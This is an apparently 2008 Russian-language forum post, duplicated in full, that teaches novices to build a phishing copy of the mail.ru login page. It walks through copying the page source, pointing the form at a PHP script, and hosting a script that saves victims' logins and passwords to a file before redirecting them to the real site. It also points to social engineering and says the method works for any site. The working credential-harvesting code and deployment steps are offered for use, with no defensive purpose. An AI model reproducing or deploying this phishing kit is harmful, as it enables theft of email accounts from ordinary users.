_GlaD1aT(OR)_
02.08.2008, 14:18
Делаем фейк на mail.ru
Посмотрел несколько тем про фейки на разные сайты и увидел что их продают за 50, 70 рублей и очюмел. Вот и решел написать мини-статью о содании фейках. Буду обьяснять для тех, кто в PHP и HTML не разбирается. И так, для примера нашего фейка возьму одну из самый популярных почтовую систему http://mail.ru, нам надо сделать поддельную страницу авторизации...Я буду работать через свой любимый браузер Mozilla ForeFox, ну что, как говориться - поехалииии!!! Сначала скопируем в браузер ссылку http://win.mail.ru/cgi-bin/login, если все сделали правильно, то перед вами должна открыться страница авторизации на mail.ru. Далее жмем вид - исходный текст страницы (Ctrl+U). Перед вами открылась страница с непонятными буквами и цифрами, если это так, то вы делаете все правильно...теперь надо нажать правка - выделить все (Ctrl+A), потом опять нажимаем правка, и так копировать (Ctrl+C), Теперь открываем блокнот, и там нажимаем вставить (Ctrl+V). Так, давайте продолжим создание. Теперь основная часть фейка, надо изменить в тексте несколько скрочек, так как текс большой, и искать их будет очень долго, то для этого будем использовать поиск по тексту, нажав Ctrl+F. Сразу напишу, кто с текстом работает плохо, то пусть использует комбинацию Ctrl+H (замена текста), а я предпочитаю так и многие пользователи обычным выделением/копипоранием/вставлением, еле написал. Нажимаем Ctrl+F и ищем следующий текст:
<form method="post" action="auth" onSubmit="return CheckForm(this);">
этот текст надо поменять на вот этот код:
<form method="post" action="mail.php" onSubmit="return CheckForm(this);">.
Этим мы с помощью будующей страницы будем сохранять данные. Так, чють не забыл, находим есче вот эту строки
<input type="hidden" name="page" value="">
<input type="hidden" name="post" value="">
<input type="hidden" name="login_from" value="">
их надо удалить. И теперь нажимаем Файл - Сохранить как (Ctrl+Shift+S) и сохраняем файл с именем index.php. Фуф, основную страницу фейка мы сделали. Теперь надо создать страницу, с помощью которой, данные которые вводит жертва, сохранились нам на хост. Опять открываем блокнот и копируем куда вот этот тект:
<?PHP
$Login = $_POST['Login'];Логин от E-mail'a
$Domain = $_POST['Domain'];//Домен (mail, inbox, list, bk)
$Pass = $_POST['Password'];//Пароль от E-mail'a
$c = "$Login@$Domain:$Pass";
$fp = fopen("file","a+"); //открыть файл
fwrite($fp,"\n $c <br> \n");//записываем вс` данные
fclose($fp); //закрываем
header("Location: http://win.mail.ru/cgi-bin/login"); //куда перенавравиться пользователь после ввода данных
echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://win.mail.ru/cgi-bin/start?1390370218\">"
?>
И сохраняем этот файл как mail.php нажав Ctrl+Shift+S.
Теперь надо опять-же открыть блокнот, и нажать сохранить как с именем file. Писать там ничего не надо. Все фейк готов, осталось только залить все (3-файла) на хостинг. Я буду приводить пример на бесплатном хостинге http://ho.com.ua. Регистрируем аккуант, думаю проблем не возникнет, за тем заходим в панель управления хостингом, нажимаем на кнопку на которой написано "Управление файлами" и откроется новое окно - Файловый менеджер (У кого есть FTP, то используйте его, я пользуюсь FileZilla FTP Client). Заходим в папку htdocs и удаляем от туда все файлы, потом закачайте все файлы котороые мы только что создали! И наконец последнее что вам осталось сделать это поставить режим доступа на все файлы 754, кроме файла file.txt, на него поставить права 777, его оставляем как есть. Ну и все, фейк готов. Как впарить фейк жертве, это соверщенно другая тема. Учите СИ и вперед. Удачи, все вопросы писать тут. И кстати, таким способом можно написать фейк с любого сайта.
Copyright ©2008
Посмотрел несколько тем про фейки на разные сайты и увидел что их продают за 50, 70 рублей и очюмел. Вот и решел написать мини-статью о содании фейках. Буду обьяснять для тех, кто в PHP и HTML не разбирается. И так, для примера нашего фейка возьму одну из самый популярных почтовую систему http://mail.ru, нам надо сделать поддельную страницу авторизации...Я буду работать через свой любимый браузер Mozilla ForeFox, ну что, как говориться - поехалииии!!! Сначала скопируем в браузер ссылку http://win.mail.ru/cgi-bin/login, если все сделали правильно, то перед вами должна открыться страница авторизации на mail.ru. Далее жмем вид - исходный текст страницы (Ctrl+U). Перед вами открылась страница с непонятными буквами и цифрами, если это так, то вы делаете все правильно...теперь надо нажать правка - выделить все (Ctrl+A), потом опять нажимаем правка, и так копировать (Ctrl+C), Теперь открываем блокнот, и там нажимаем вставить (Ctrl+V). Так, давайте продолжим создание. Теперь основная часть фейка, надо изменить в тексте несколько скрочек, так как текс большой, и искать их будет очень долго, то для этого будем использовать поиск по тексту, нажав Ctrl+F. Сразу напишу, кто с текстом работает плохо, то пусть использует комбинацию Ctrl+H (замена текста), а я предпочитаю так и многие пользователи обычным выделением/копипоранием/вставлением, еле написал. Нажимаем Ctrl+F и ищем следующий текст:
<form method="post" action="auth" onSubmit="return CheckForm(this);">
этот текст надо поменять на вот этот код:
<form method="post" action="mail.php" onSubmit="return CheckForm(this);">.
Этим мы с помощью будующей страницы будем сохранять данные. Так, чють не забыл, находим есче вот эту строки
<input type="hidden" name="page" value="">
<input type="hidden" name="post" value="">
<input type="hidden" name="login_from" value="">
их надо удалить. И теперь нажимаем Файл - Сохранить как (Ctrl+Shift+S) и сохраняем файл с именем index.php. Фуф, основную страницу фейка мы сделали. Теперь надо создать страницу, с помощью которой, данные которые вводит жертва, сохранились нам на хост. Опять открываем блокнот и копируем куда вот этот тект:
<?PHP
$Login = $_POST['Login'];Логин от E-mail'a
$Domain = $_POST['Domain'];//Домен (mail, inbox, list, bk)
$Pass = $_POST['Password'];//Пароль от E-mail'a
$c = "$Login@$Domain:$Pass";
$fp = fopen("file","a+"); //открыть файл
fwrite($fp,"\n $c <br> \n");//записываем вс` данные
fclose($fp); //закрываем
header("Location: http://win.mail.ru/cgi-bin/login"); //куда перенавравиться пользователь после ввода данных
echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://win.mail.ru/cgi-bin/start?1390370218\">"
?>
И сохраняем этот файл как mail.php нажав Ctrl+Shift+S.
Теперь надо опять-же открыть блокнот, и нажать сохранить как с именем file. Писать там ничего не надо. Все фейк готов, осталось только залить все (3-файла) на хостинг. Я буду приводить пример на бесплатном хостинге http://ho.com.ua. Регистрируем аккуант, думаю проблем не возникнет, за тем заходим в панель управления хостингом, нажимаем на кнопку на которой написано "Управление файлами" и откроется новое окно - Файловый менеджер (У кого есть FTP, то используйте его, я пользуюсь FileZilla FTP Client). Заходим в папку htdocs и удаляем от туда все файлы, потом закачайте все файлы котороые мы только что создали! И наконец последнее что вам осталось сделать это поставить режим доступа на все файлы 754, кроме файла file.txt, на него поставить права 777, его оставляем как есть. Ну и все, фейк готов. Как впарить фейк жертве, это соверщенно другая тема. Учите СИ и вперед. Удачи, все вопросы писать тут. И кстати, таким способом можно написать фейк с любого сайта.
Copyright ©2008